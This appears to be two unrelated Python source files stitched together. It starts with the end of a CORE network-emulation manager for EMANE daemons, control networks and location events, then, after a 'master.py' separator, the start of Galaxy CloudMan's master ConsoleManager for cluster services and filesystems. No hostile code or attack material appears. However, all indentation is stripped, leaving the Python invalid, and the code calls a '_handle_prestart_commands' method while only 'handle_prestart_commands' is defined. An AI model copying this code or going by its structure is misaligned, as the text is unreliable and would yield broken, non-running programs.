associate models with EmaneNodes from self.config. Returns
Emane.(SUCCESS, NOT_NEEDED, NOT_READY) in order to delay session
instantiation.
"""
logging.debug("emane setup")
# TODO: drive this from the session object
with self.session._nodes_lock:
for node_id in self.session.nodes:
node = self.session.nodes[node_id]
if nodeutils.is_node(node, NodeTypes.EMANE):
logging.debug("adding emane node: id(%s) name(%s)", node.id, node.name)
self.add_node(node)
if not self._emane_nodes:
logging.debug("no emane nodes in session")
return EmaneManager.NOT_NEEDED
# control network bridge required for EMANE 0.9.2
# - needs to be configured before checkdistributed() for distributed
# - needs to exist when eventservice binds to it (initeventservice)
if self.session.master:
otadev = self.get_config("otamanagerdevice")
netidx = self.session.get_control_net_index(otadev)
logging.debug("emane ota manager device: index(%s) otadev(%s)", netidx, otadev)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid OTA device provided: %s", otadev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
eventdev = self.get_config("eventservicedevice")
logging.debug("emane event service device: eventdev(%s)", eventdev)
if eventdev != otadev:
netidx = self.session.get_control_net_index(eventdev)
logging.debug("emane event service device index: %s", netidx)
if netidx < 0:
logging.error("EMANE cannot start, check core config. invalid event service device: %s", eventdev)
return EmaneManager.NOT_READY
ctrlnet = self.session.add_remove_control_net(net_index=netidx, remove=False, conf_required=False)
self.distributedctrlnet(ctrlnet)
if self.checkdistributed():
# we are slave, but haven't received a platformid yet
platform_id_start = "platform_id_start"
default_values = self.emane_config.default_values()
value = self.get_config(platform_id_start)
if value == default_values[platform_id_start]:
return EmaneManager.NOT_READY
self.check_node_models()
return EmaneManager.SUCCESS
def startup(self):
"""
After all the EmaneNode objects have been added, build XML files
and start the daemons. Returns Emane.(SUCCESS, NOT_NEEDED, or
NOT_READY) which is used to delay session instantiation.
"""
self.reset()
r = self.setup()
# NOT_NEEDED or NOT_READY
if r != EmaneManager.SUCCESS:
return r
nems = []
with self._emane_node_lock:
self.buildxml()
self.initeventservice()
self.starteventmonitor()
if self.numnems() > 0:
self.startdaemons()
self.installnetifs()
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
for netif in emane_node.netifs():
nems.append((netif.node.name, netif.name, emane_node.getnemid(netif)))
if nems:
emane_nems_filename = os.path.join(self.session.session_dir, "emane_nems")
try:
with open(emane_nems_filename, "w") as f:
for nodename, ifname, nemid in nems:
f.write("%s %s %s\n" % (nodename, ifname, nemid))
except IOError:
logging.exception("Error writing EMANE NEMs file: %s")
return EmaneManager.SUCCESS
def poststartup(self):
"""
Retransmit location events now that all NEMs are active.
"""
if not self.genlocationevents():
return
with self._emane_node_lock:
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.debug("post startup for emane node: %s - %s", emane_node.id, emane_node.name)
emane_node.model.post_startup()
for netif in emane_node.netifs():
x, y, z = netif.node.position.get()
emane_node.setnemposition(netif, x, y, z)
def reset(self):
"""
remove all EmaneNode objects from the dictionary,
reset port numbers and nem id counters
"""
with self._emane_node_lock:
self._emane_nodes.clear()
# don't clear self._ifccounts here; NEM counts are needed for buildxml
self.platformport = self.session.options.get_config_int("emane_platform_port", 8100)
self.transformport = self.session.options.get_config_int("emane_transform_port", 8200)
def shutdown(self):
"""
stop all EMANE daemons
"""
with self._ifccountslock:
self._ifccounts.clear()
with self._emane_node_lock:
if not self._emane_nodes:
return
logging.info("stopping EMANE daemons.")
self.deinstallnetifs()
self.stopdaemons()
self.stopeventmonitor()
def handledistributed(self, message):
"""
Broker handler for processing CORE API messages as they are
received. This is used to snoop the Link add messages to get NEM
counts of NEMs that exist on other servers.
"""
if message.message_type == MessageTypes.LINK.value and message.flags & MessageFlags.ADD.value:
nn = message.node_numbers()
# first node is always link layer node in Link add message
if nn[0] in self.session.broker.network_nodes:
serverlist = self.session.broker.getserversbynode(nn[1])
for server in serverlist:
with self._ifccountslock:
if server not in self._ifccounts:
self._ifccounts[server] = 1
else:
self._ifccounts[server] += 1
def checkdistributed(self):
"""
Check for EMANE nodes that exist on multiple emulation servers and
coordinate the NEM id and port number space.
If we are the master EMANE node, return False so initialization will
proceed as normal; otherwise slaves return True here and
initialization is deferred.
"""
# check with the session if we are the "master" Emane object?
master = False
with self._emane_node_lock:
if self._emane_nodes:
master = self.session.master
logging.info("emane check distributed as master: %s.", master)
# we are not the master Emane object, wait for nem id and ports
if not master:
return True
nemcount = 0
with self._emane_node_lock:
for key in self._emane_nodes:
emane_node = self._emane_nodes[key]
nemcount += emane_node.numnetif()
nemid = int(self.get_config("nem_id_start"))
nemid += nemcount
platformid = int(self.get_config("platform_id_start"))
# build an ordered list of servers so platform ID is deterministic
servers = []
for key in sorted(self._emane_nodes):
for server in self.session.broker.getserversbynode(key):
if server not in servers:
servers.append(server)
servers.sort(key=lambda x: x.name)
for server in servers:
if server.name == "localhost":
continue
if server.sock is None:
continue
platformid += 1
typeflags = ConfigFlags.UPDATE.value
self.set_config("platform_id_start", str(platformid))
self.set_config("nem_id_start", str(nemid))
config_data = ConfigShim.config_data(0, None, typeflags, self.emane_config, self.get_configs())
message = dataconversion.convert_config(config_data)
server.sock.send(message)
# increment nemid for next server by number of interfaces
with self._ifccountslock:
if server in self._ifccounts:
nemid += self._ifccounts[server]
return False
def buildxml(self):
"""
Build XML files required to run EMANE on each node.
NEMs run inside containers using the control network for passing
events and data.
"""
# assume self._objslock is already held here
logging.info("emane building xml...")
# on master, control network bridge added earlier in startup()
ctrlnet = self.session.add_remove_control_net(net_index=0, remove=False, conf_required=False)
self.buildplatformxml(ctrlnet)
self.buildnemxml()
self.buildeventservicexml()
# TODO: remove need for tlv messaging
def distributedctrlnet(self, ctrlnet):
"""
Distributed EMANE requires multiple control network prefixes to
be configured. This generates configuration for slave control nets
using the default list of prefixes.
"""
session = self.session
# slave server
if not session.master:
return
servers = session.broker.getservernames()
# not distributed
if len(servers) < 2:
return
prefix = session.options.get_config("controlnet")
prefixes = prefix.split()
# normal Config messaging will distribute controlnets
if len(prefixes) >= len(servers):
return
# this generates a config message having controlnet prefix assignments
logging.info("Setting up default controlnet prefixes for distributed (%d configured)" % len(prefixes))
prefixes = ctrlnet.DEFAULT_PREFIX_LIST[0]
vals = 'controlnet="%s"' % prefixes
tlvdata = b""
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.OBJECT.value, "session")
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.TYPE.value, 0)
tlvdata += coreapi.CoreConfigTlv.pack(ConfigTlvs.VALUES.value, vals)
rawmsg = coreapi.CoreConfMessage.pack(0, tlvdata)
msghdr = rawmsg[:coreapi.CoreMessage.header_len]
msg = coreapi.CoreConfMessage(flags=0, hdr=msghdr, data=rawmsg[coreapi.CoreMessage.header_len:])
self.session.broker.handle_message(msg)
def check_node_models(self):
"""
Associate EmaneModel classes with EmaneNode nodes. The model
configurations are stored in self.configs.
"""
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
logging.debug("checking emane model for node: %s", node_id)
# skip nodes that already have a model set
if emane_node.model:
logging.debug("node(%s) already has model(%s)", emane_node.id, emane_node.model.name)
continue
# set model configured for node, due to legacy messaging configuration before nodes exist
model_name = self.node_models.get(node_id)
if not model_name:
logging.error("emane node(%s) has no node model", node_id)
raise ValueError("emane node has no model set")
config = self.get_model_config(node_id=node_id, model_name=model_name)
logging.debug("setting emane model(%s) config(%s)", model_name, config)
model_class = self.models[model_name]
emane_node.setmodel(model_class, config)
def nemlookup(self, nemid):
"""
Look for the given numerical NEM ID and return the first matching
EmaneNode and NEM interface.
"""
emane_node = None
netif = None
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
netif = emane_node.getnemnetif(nemid)
if netif is not None:
break
else:
emane_node = None
return emane_node, netif
def numnems(self):
"""
Return the number of NEMs emulated locally.
"""
count = 0
for node_id in self._emane_nodes:
emane_node = self._emane_nodes[node_id]
count += len(emane_node.netifs())
return count
def buildplatformxml(self, ctrlnet):
"""
Build a platform.xml file now that all nodes are configured.
"""
nemid = int(self.get_config("nem_id_start"))
platform_xmls = {}
# assume self._objslock is already held here
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
nemid = emanexml.build_node_platform_xml(self, ctrlnet, emane_node, nemid, platform_xmls)
def buildnemxml(self):
"""
Builds the xxxnem.xml, xxxmac.xml, and xxxphy.xml files which
are defined on a per-EmaneNode basis.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emanexml.build_xml_files(self, emane_node)
def buildtransportxml(self):
"""
Calls emanegentransportxml using a platform.xml file to build the transportdaemon*.xml.
"""
utils.check_cmd(["emanegentransportxml", "platform.xml"], cwd=self.session.session_dir)
def buildeventservicexml(self):
"""
Build the libemaneeventservice.xml file if event service options
were changed in the global config.
"""
need_xml = False
default_values = self.emane_config.default_values()
for name in ["eventservicegroup", "eventservicedevice"]:
a = default_values[name]
b = self.get_config(name)
if a != b:
need_xml = True
if not need_xml:
# reset to using default config
self.initeventservice()
return
try:
group, port = self.get_config("eventservicegroup").split(":")
except ValueError:
logging.exception("invalid eventservicegroup in EMANE config")
return
dev = self.get_config("eventservicedevice")
emanexml.create_event_service_xml(group, port, dev, self.session.session_dir)
def startdaemons(self):
"""
Start one EMANE daemon per node having a radio.
Add a control network even if the user has not configured one.
"""
logging.info("starting emane daemons...")
loglevel = str(EmaneManager.DEFAULT_LOG_LEVEL)
cfgloglevel = self.session.options.get_config_int("emane_log_level")
realtime = self.session.options.get_config_bool("emane_realtime", default=True)
if cfgloglevel:
logging.info("setting user-defined EMANE log level: %d", cfgloglevel)
loglevel = str(cfgloglevel)
emanecmd = ["emane", "-d", "-l", loglevel]
if realtime:
emanecmd += "-r",
otagroup, _otaport = self.get_config("otamanagergroup").split(":")
otadev = self.get_config("otamanagerdevice")
otanetidx = self.session.get_control_net_index(otadev)
eventgroup, _eventport = self.get_config("eventservicegroup").split(":")
eventdev = self.get_config("eventservicedevice")
eventservicenetidx = self.session.get_control_net_index(eventdev)
run_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
run_emane_on_host = True
continue
path = self.session.session_dir
n = node.id
# control network not yet started here
self.session.add_remove_control_interface(node, 0, remove=False, conf_required=False)
if otanetidx > 0:
logging.info("adding ota device ctrl%d", otanetidx)
self.session.add_remove_control_interface(node, otanetidx, remove=False, conf_required=False)
if eventservicenetidx >= 0:
logging.info("adding event service device ctrl%d", eventservicenetidx)
self.session.add_remove_control_interface(node, eventservicenetidx, remove=False, conf_required=False)
# multicast route is needed for OTA data
args = [constants.IP_BIN, "route", "add", otagroup, "dev", otadev]
node.check_cmd(args)
# multicast route is also needed for event data if on control network
if eventservicenetidx >= 0 and eventgroup != otagroup:
args = [constants.IP_BIN, "route", "add", eventgroup, "dev", eventdev]
node.check_cmd(args)
# start emane
args = emanecmd + ["-f", os.path.join(path, "emane%d.log" % n), os.path.join(path, "platform%d.xml" % n)]
output = node.check_cmd(args)
logging.info("node(%s) emane daemon running: %s", node.name, args)
logging.info("node(%s) emane daemon output: %s", node.name, output)
if not run_emane_on_host:
return
path = self.session.session_dir
emanecmd += ["-f", os.path.join(path, "emane.log")]
args = emanecmd + [os.path.join(path, "platform.xml")]
utils.check_cmd(args, cwd=path)
logging.info("host emane daemon running: %s", args)
def stopdaemons(self):
"""
Kill the appropriate EMANE daemons.
"""
# TODO: we may want to improve this if we had the PIDs from the specific EMANE daemons that we"ve started
args = ["killall", "-q", "emane"]
stop_emane_on_host = False
for node in self.getnodes():
if hasattr(node, "transport_type") and node.transport_type == "raw":
stop_emane_on_host = True
continue
if node.up:
node.cmd(args, wait=False)
# TODO: RJ45 node
if stop_emane_on_host:
try:
utils.check_cmd(args)
utils.check_cmd(["killall", "-q", "emanetransportd"])
except CoreCommandError:
logging.exception("error shutting down emane daemons")
def installnetifs(self):
"""
Install TUN/TAP virtual interfaces into their proper namespaces
now that the EMANE daemons are running.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
logging.info("emane install netifs for node: %d", key)
emane_node.installnetifs()
def deinstallnetifs(self):
"""
Uninstall TUN/TAP virtual interfaces.
"""
for key in sorted(self._emane_nodes.keys()):
emane_node = self._emane_nodes[key]
emane_node.deinstallnetifs()
def doeventmonitor(self):
"""
Returns boolean whether or not EMANE events will be monitored.
"""
# this support must be explicitly turned on; by default, CORE will
# generate the EMANE events when nodes are moved
return self.session.options.get_config_bool("emane_event_monitor")
def genlocationevents(self):
"""
Returns boolean whether or not EMANE events will be generated.
"""
# By default, CORE generates EMANE location events when nodes
# are moved; this can be explicitly disabled in core.conf
tmp = self.session.options.get_config_bool("emane_event_generate")
if tmp is None:
tmp = not self.doeventmonitor()
return tmp
def starteventmonitor(self):
"""
Start monitoring EMANE location events if configured to do so.
"""
logging.info("emane start event monitor")
if not self.doeventmonitor():
return
if self.service is None:
logging.error("Warning: EMANE events will not be generated "
"because the emaneeventservice\n binding was "
"unable to load "
"(install the python-emaneeventservice bindings)")
return
self.doeventloop = True
self.eventmonthread = threading.Thread(target=self.eventmonitorloop)
self.eventmonthread.daemon = True
self.eventmonthread.start()
def stopeventmonitor(self):
"""
Stop monitoring EMANE location events.
"""
self.doeventloop = False
if self.service is not None:
self.service.breakloop()
# reset the service, otherwise nextEvent won"t work
self.initeventservice(shutdown=True)
if self.eventmonthread is not None:
# TODO: fix this
self.eventmonthread._Thread__stop()
self.eventmonthread.join()
self.eventmonthread = None
def eventmonitorloop(self):
"""
Thread target that monitors EMANE location events.
"""
if self.service is None:
return
logging.info("subscribing to EMANE location events. (%s)", threading.currentThread().getName())
while self.doeventloop is True:
_uuid, _seq, events = self.service.nextEvent()
# this occurs with 0.9.1 event service
if not self.doeventloop:
break
for event in events:
nem, eid, data = event
if eid == LocationEvent.IDENTIFIER:
self.handlelocationevent(nem, eid, data)
logging.info("unsubscribing from EMANE location events. (%s)", threading.currentThread().getName())
def handlelocationevent(self, rxnemid, eid, data):
"""
Handle an EMANE location event.
"""
events = LocationEvent()
events.restore(data)
for event in events:
txnemid, attrs = event
if "latitude" not in attrs or "longitude" not in attrs or "altitude" not in attrs:
logging.warning("dropped invalid location event")
continue
# yaw,pitch,roll,azimuth,elevation,velocity are unhandled
lat = attrs["latitude"]
lon = attrs["longitude"]
alt = attrs["altitude"]
logging.debug("emane location event: %s,%s,%s", lat, lon, alt)
self.handlelocationeventtoxyz(txnemid, lat, lon, alt)
def handlelocationeventtoxyz(self, nemid, lat, lon, alt):
"""
Convert the (NEM ID, lat, long, alt) from a received location event
into a node and x,y,z coordinate values, sending a Node Message.
Returns True if successfully parsed and a Node Message was sent.
"""
# convert nemid to node number
_emanenode, netif = self.nemlookup(nemid)
if netif is None:
logging.info("location event for unknown NEM %s", nemid)
return False
n = netif.node.id
# convert from lat/long/alt to x,y,z coordinates
x, y, z = self.session.location.getxyz(lat, lon, alt)
x = int(x)
y = int(y)
z = int(z)
logging.info("location event NEM %s (%s, %s, %s) -> (%s, %s, %s)", nemid, lat, lon, alt, x, y, z)
xbit_check = x.bit_length() > 16 or x < 0
ybit_check = y.bit_length() > 16 or y < 0
zbit_check = z.bit_length() > 16 or z < 0
if any([xbit_check, ybit_check, zbit_check]):
logging.error("Unable to build node location message, received lat/long/alt exceeds coordinate "
"space: NEM %s (%d, %d, %d)", nemid, x, y, z)
return False
# generate a node message for this location update
try:
node = self.session.get_node(n)
except KeyError:
logging.exception("location event NEM %s has no corresponding node %s" % (nemid, n))
return False
# don"t use node.setposition(x,y,z) which generates an event
node.position.set(x, y, z)
node_data = node.data(message_type=0, lat=str(lat), lon=str(lon), alt=str(alt))
self.session.broadcast_node(node_data)
return True
def emanerunning(self, node):
"""
Return True if an EMANE process associated with the given node is running, False otherwise.
"""
args = ["pkill", "-0", "-x", "emane"]
status = node.cmd(args)
return status == 0
class EmaneGlobalModel(EmaneModel):
"""
Global EMANE configuration options.
"""
_DEFAULT_DEV = "ctrl0"
name = "emane"
emulator_xml = "/usr/share/emane/manifest/nemmanager.xml"
emulator_defaults = {
"eventservicedevice": _DEFAULT_DEV,
"eventservicegroup": "224.1.2.8:45703",
"otamanagerdevice": _DEFAULT_DEV,
"otamanagergroup": "224.1.2.8:45702"
}
emulator_config = emanemanifest.parse(emulator_xml, emulator_defaults)
emulator_config.insert(
0,
Configuration(_id="platform_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting Platform ID (core)")
)
nem_config = [
Configuration(_id="nem_id_start", _type=ConfigDataTypes.INT32, default="1",
label="Starting NEM ID (core)")
]
@classmethod
def configurations(cls):
return cls.emulator_config + cls.nem_config
@classmethod
def config_groups(cls):
emulator_len = len(cls.emulator_config)
config_len = len(cls.configurations())
return [
ConfigGroup("Platform Attributes", 1, emulator_len),
ConfigGroup("NEM Parameters", emulator_len + 1, config_len)
]
def __init__(self, session, _id=None):
super(EmaneGlobalModel, self).__init__(session, _id)
def build_xml_files(self, config, interface=None):
raise NotImplementedError
|
master.py
|
"""Galaxy CM master manager"""
import commands
import fileinput
import logging
import logging.config
import os
import subprocess
import threading
import time
import datetime as dt
import json
import shutil
from cm.services import ServiceRole
from cm.services import ServiceType
from cm.services import service_states
from cm.services.apps.galaxy import GalaxyService
from cm.services.apps.galaxyreports import GalaxyReportsService
from cm.services.apps.hadoop import HadoopService
from cm.services.apps.htcondor import HTCondorService
from cm.services.apps.migration import MigrationService
from cm.services.apps.postgres import PostgresService
from cm.services.apps.proftpd import ProFTPdService
from cm.services.apps.pss import PSSService
from cm.services.apps.sge import SGEService
from cm.services.autoscale import Autoscale
from cm.services.data.filesystem import Filesystem
from cm.util import (cluster_status, comm, instance_lifecycle, instance_states,
misc, spot_states, Time)
from cm.util.decorators import TestFlag
from cm.util.manager import BaseConsoleManager
import cm.util.paths as paths
from boto.exception import EC2ResponseError, S3ResponseError
log = logging.getLogger('cloudman')
# Time well in past to seend reboot, last comm times with.
TIME_IN_PAST = dt.datetime(2012, 1, 1, 0, 0, 0)
s3_rlock = threading.RLock()
def synchronized(rlock):
"""
Synchronization decorator
http://stackoverflow.com/a/490090
"""
def wrap(f):
def newFunction(*args, **kw):
with rlock:
return f(*args, **kw)
return newFunction
return wrap
class ConsoleManager(BaseConsoleManager):
node_type = "master"
def __init__(self, app):
self.startup_time = Time.now()
log.debug("Initializing console manager - cluster start time: %s" %
self.startup_time)
self.app = app
self.console_monitor = ConsoleMonitor(self.app)
self.root_pub_key = None
self.cluster_status = cluster_status.STARTING
self.num_workers_requested = 0 # Number of worker nodes requested by user
# The actual worker nodes (note: this is a list of Instance objects)
# (because get_worker_instances currently depends on tags, which is only
# supported by EC2, get the list of instances only for the case of EC2 cloud.
# This initialization is applicable only when restarting a cluster.
self.worker_instances = self.get_worker_instances() if (self.app.cloud_type == 'ec2' or self.app.cloud_type == 'openstack') else []
self.disk_total = "0"
self.disk_used = "0"
self.disk_pct = "0%"
self.manager_started = False
self.cluster_manipulation_in_progress = False
# If this is set to False, the master instance will not be an execution
# host in SGE and thus not be running any jobs
self.master_exec_host = True
self.initial_cluster_type = None
self.cluster_storage_type = None
self.services = []
# Static data - get snapshot IDs from the default bucket and add respective file systems
self.snaps = self._load_snapshot_data()
self.default_galaxy_data_size = 0
def add_master_service(self, new_service):
if not self.get_services(svc_name=new_service.name):
log.debug("Adding service %s into the master service registry" % new_service.name)
self.services.append(new_service)
self._update_dependencies(new_service, "ADD")
else:
log.debug("Would add master service %s but one already exists" % new_service.name)
def remove_master_service(self, service_to_remove):
self.services.remove(service_to_remove)
self._update_dependencies(service_to_remove, "REMOVE")
def _update_dependencies(self, new_service, action):
"""
Updates service dependencies when a new service is added.
Iterates through all services and if action is "ADD",
and the newly added service fulfills the requirements of an
existing service, sets the new service as the service assigned
to fulfill the existing service.
If the action is "REMOVE", then the dependent service's
assigned service property is set to null for all services
which depend on the new service.
"""
log.debug("Updating dependencies for service {0}".format(new_service.name))
for svc in self.services:
if action == "ADD":
for req in new_service.dependencies:
if req.is_satisfied_by(svc):
# log.debug("Service {0} has a dependency on role {1}. Dependency updated during service action: {2}".format(
# req.owning_service.name, new_service.name, action))
req.assigned_service = svc
elif action == "REMOVE":
for req in svc.dependencies:
if req.is_satisfied_by(new_service):
# log.debug("Service {0} has a dependency on role {1}. Dependency updated during service action: {2}".format(
# req.owning_service.name, new_service.name, action))
req.assigned_service = None
def _stop_app_level_services(self):
""" Convenience function that suspends SGE jobs and removes Galaxy &
Postgres services, thus allowing system level operations to be performed."""
# Suspend all SGE jobs
log.debug("Suspending SGE queue all.q")
misc.run('export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; %s/bin/lx24-amd64/qmod -sq all.q'
% (self.app.path_resolver.sge_root, self.app.path_resolver.sge_root), "Error suspending SGE jobs", "Successfully suspended all SGE jobs.")
# Stop application-level services managed via CloudMan
# If additional service are to be added as things CloudMan can handle,
# the should be added to do for-loop list (in order in which they are
# to be removed)
if self.initial_cluster_type == 'Galaxy':
for svc_role in [ServiceRole.GALAXY, ServiceRole.GALAXY_POSTGRES,
ServiceRole.PROFTPD]:
try:
svc = self.get_services(svc_role=svc_role)
if svc:
svc[0].remove()
except IndexError, e:
log.error("Tried removing app level service '%s' but failed: %s"
% (svc_role, e))
def _start_app_level_services(self):
# Resume application-level services managed via CloudMan
# If additional service are to be added as things CloudMan can handle,
# the should be added to do for-loop list (in order in which they are
# to be added)
for svc_role in [ServiceRole.GALAXY_POSTGRES, ServiceRole.PROFTPD,
ServiceRole.GALAXY]:
try:
svc = self.get_services(svc_role=svc_role)
if svc:
svc[0].add()
except IndexError, e:
log.error("Tried adding app level service '%s' but failed: %s"
% (ServiceRole.to_string([svc_role]), e))
log.debug("Unsuspending SGE queue all.q")
misc.run('export SGE_ROOT=%s; . $SGE_ROOT/default/common/settings.sh; %s/bin/lx24-amd64/qmod -usq all.q'
% (self.app.path_resolver.sge_root, self.app.path_resolver.sge_root),
"Error unsuspending SGE jobs",
"Successfully unsuspended all SGE jobs")
def recover_monitor(self, force='False'):
if self.console_monitor:
if force == 'True':
self.console_monitor.shutdown()
else:
return False
self.console_monitor = ConsoleMonitor(self.app)
self.console_monitor.start()
return True
def snapshot_status(self):
"""
Get the status of a file system volume currently being snapshoted. This
method looks through all the file systems and all volumes assoc. with a
file system and returns the status and progress for thee first volume
going through the snapshot process.
In addition, if a file system is marked as needing to 'grow' or sharing
the cluster is currently pending but no volumes are currently being
snapshoted, the method returns 'configuring' as the status.
:rtype: array of strings of length 2
:return: A pair of values as strings indicating (1) the status (e.g.,
pending, complete) of the snapshot and (2) the progress.
"""
fsarr = self.get_services(svc_type=ServiceType.FILE_SYSTEM)
for fs in fsarr:
for vol in fs.volumes:
if vol.snapshot_status is not None:
return (vol.snapshot_status, vol.snapshot_progress)
# No volume is being snapshoted; check if waiting to 'grow' one
if fs.grow:
return ("configuring", None)
if self.cluster_manipulation_in_progress:
return ("configuring", None)
return (None, None)
@TestFlag([])
@synchronized(s3_rlock)
def _load_snapshot_data(self):
"""
Retrieve and return information about the default filesystems.
This is done by retrieving ``snaps.yaml`` from the default bucket and
parsing it to match the current cloud, region, and deployment.
Returns a list of dictionaries.
"""
s3_conn = self.app.cloud_interface.get_s3_connection()
snaps_file = 'cm_snaps.yaml'
snaps = []
cloud_name = self.app.ud.get('cloud_name', 'amazon').lower()
# Get a list of default file system data sources
if s3_conn and misc.get_file_from_bucket(s3_conn, self.app.ud['bucket_default'],
'snaps.yaml', snaps_file):
pass
elif misc.get_file_from_public_bucket(self.app.ud, self.app.ud['bucket_default'], 'snaps.yaml', snaps_file):
log.warn("Couldn't get snaps.yaml from bucket: %s. However, managed to retrieve from public s3 url instead." % self.app.ud['bucket_default'])
else:
log.error("Couldn't get snaps.yaml at all! Will not be able to create Galaxy Data and Index volumes.")
return []
snaps_file = misc.load_yaml_file(snaps_file)
if 'static_filesystems' in snaps_file:
# Old snaps.yaml format
snaps = snaps_file['static_filesystems']
# Convert the old format into the new one and return a
# uniform snaps dict
for f in snaps:
f['name'] = f['filesystem'] # Rename the key
f.pop('filesystem', None) # Delete the old key
else:
# Unify all Amazon regions and/or name variations to a single one
if 'amazon' in cloud_name:
cloud_name = 'amazon'
for cloud in snaps_file['clouds']:
if cloud_name == cloud['name'].lower():
current_cloud = cloud
for r in current_cloud['regions']:
if r['name'].lower() == self.app.cloud_interface.get_region_name().lower():
for d in r['deployments']:
# TODO: Make the deployment name a UD option
if d['name'] == 'GalaxyCloud':
snaps = d['filesystems']
log.debug("Loaded default snapshot data for cloud {1}: {0}".format(snaps,
cloud_name))
return snaps
@TestFlag(10)
def get_default_data_size(self):
if not self.default_galaxy_data_size:
for snap in self.snaps:
roles = ServiceRole.from_string_array(snap['roles'])
if ServiceRole.GALAXY_DATA in roles:
if 'size' in snap:
self.default_galaxy_data_size = snap['size']
elif 'snap_id' in snap:
self.snapshot = (self.app.cloud_interface.get_ec2_connection()
.get_all_snapshots([snap['snap_id']])[0])
self.default_galaxy_data_size = self.snapshot.volume_size
log.debug("Got default galaxy FS size as {0}GB".format(
self.default_galaxy_data_size))
return str(self.default_galaxy_data_size)
@TestFlag(False)
def start(self):
"""
This method is automatically called as CloudMan starts; it tries to add
and start available cluster services (as provided in the cluster's
configuration and persistent data).
"""
log.debug("User Data at manager start, with secret_key and password filtered out: %s" %
dict((k, self.app.ud[k]) for k in self.app.ud.keys() if k not in ['password', 'secret_key']))
self._handle_prestart_commands()
# Generating public key before any worker has been initialized
# This is required for configuring Hadoop the main Hadoop worker still needs to be
# bale to ssh into itself!!!
# this should happen before SGE is added
self.get_root_public_key()
# Always add migration service
self.add_master_service(MigrationService(self.app))
# Always add SGE service
self.add_master_service(SGEService(self.app))
# Always share instance transient storage over NFS
tfs = Filesystem(self.app, 'transient_nfs', svc_roles=[ServiceRole.TRANSIENT_NFS])
tfs.add_transient_storage()
self.add_master_service(tfs)
# Always add PSS service - note that this service runs only after the cluster
# type has been selected and all of the services are in RUNNING state
self.add_master_service(PSSService(self.app))
if self.app.config.condor_enabled:
self.add_master_service(HTCondorService(self.app, "master"))
# KWS: Optionally add Hadoop service based on config setting
if self.app.config.hadoop_enabled:
self.add_master_service(HadoopService(self.app))
# Check if starting a derived cluster and initialize from share,
# which calls add_preconfigured_services
# Note that share_string overrides everything.
if "share_string" in self.app.ud:
# BUG TODO this currently happens on reboot, and shouldn't.
self.init_shared_cluster(self.app.ud['share_string'].strip())
# else look if this is a restart of a previously existing cluster
# and add appropriate services
elif not self.add_preconfigured_services():
return False
self.manager_started = True
# Check if a previously existing cluster is being recreated or if it is a new one
if not self.initial_cluster_type: # this can get set by _handle_old_cluster_conf_format
self.initial_cluster_type = self.app.ud.get('cluster_type', None)
if self.initial_cluster_type is not None:
cc_detail = "Configuring a previously existing cluster of type {0}"\
.format(self.initial_cluster_type)
else:
cc_detail = "This is a new cluster; waiting to configure the type."
self.cluster_status = cluster_status.WAITING
else:
cc_detail = "Configuring an old existing cluster of type {0}"\
.format(self.initial_cluster_type)
log.info("Completed the initial cluster startup process. {0}".format(
cc_detail))
return True
def handle_prestart_commands(self):
"""
Inspect the user data key ``master_prestart_commands`` and simply
execute any commands provided there.
For example::
master_prestart_commands:
- "mkdir -p /mnt/galaxyData/pgsql/"
- "mkdir -p /mnt/galaxyData/tmp"
- "chown -R galaxy:galaxy /mnt/galaxyData"
"""
for command in self.app.ud.get("master_prestart_commands", []):
misc.run(command)
@TestFlag(False)
def add_preconfigured_services(self):
"""
Inspect the cluster configuration and persistent data to add any
previously defined cluster services.
"""
log.debug("Checking for and adding any previously defined cluster services")
return self.add_preconfigured_filesystems() and self.add_preconfigured_applications()
def add_preconfigured_filesystems(self):
try:
# Process the current cluster config
log.debug("Processing filesystems in an existing cluster config")
attached_volumes = self.get_attached_volumes()
if 'filesystems' in self.app.ud:
for fs in self.app.ud.get('filesystems') or []:
err = False
filesystem = Filesystem(self.app, fs['name'], svc_roles=ServiceRole.from_string_array(
fs['roles']), mount_point=fs.get('mount_point', None))
# Based on the kind, add the appropriate file system. We can
# handle 'volume', 'snapshot', or 'bucket' kind
if fs['kind'] == 'volume':
if 'ids' not in fs and 'size' in fs:
# We're creating a new volume
filesystem.add_volume(size=fs['size'])
else:
# A volume already exists so use it
for vol_id in fs['ids']:
filesystem.add_volume(vol_id=vol_id)
elif fs['kind'] == 'snapshot':
for snap in fs['ids']:
# Check if an already attached volume maps to this snapshot
att_vol = self.get_vol_if_fs(attached_volumes, fs['name'])
if att_vol:
filesystem.add_volume(vol_id=att_vol.id, size=att_vol.size,
from_snapshot_id=att_vol.snapshot_id)
else:
filesystem.add_volume(from_snapshot_id=snap)
elif fs['kind'] == 'nfs':
filesystem.add_nfs(fs['nfs_server'], None, None, mount_options=fs.get('mount_options', None))
elif fs['kind'] == 'gluster':
filesystem.add_glusterfs(fs['gluster_server'], mount_options=fs.get('mount_options', None))
elif fs['kind'] == 'transient':
filesystem.add_transient_storage(persistent=True)
elif fs['kind'] == 'bucket':
a_key = fs.get('access_key', None)
s_key = fs.get('secret_key', None)
# Can have only a single bucket per file system so
# access it directly
bucket_name = fs.get('ids', [None])[0]
if bucket_name:
filesystem.add_bucket(bucket_name, a_key, s_key)
else:
log.warning("No bucket name for file system {0}!".format(
fs['name']))
# TODO: include support for `nfs` kind
else:
# TODO: try to do some introspection on the device ID
# to guess the kind before err
err = True
log.warning("Device kind '{0}' for file system {1} not recognized; "
"not adding the file system.".format(fs['kind'], fs['name']))
if not err:
log.debug("Adding a previously existing filesystem '{0}' of "
"kind '{1}'".format(fs['name'], fs['kind']))
self.add_master_service(filesystem)
return True
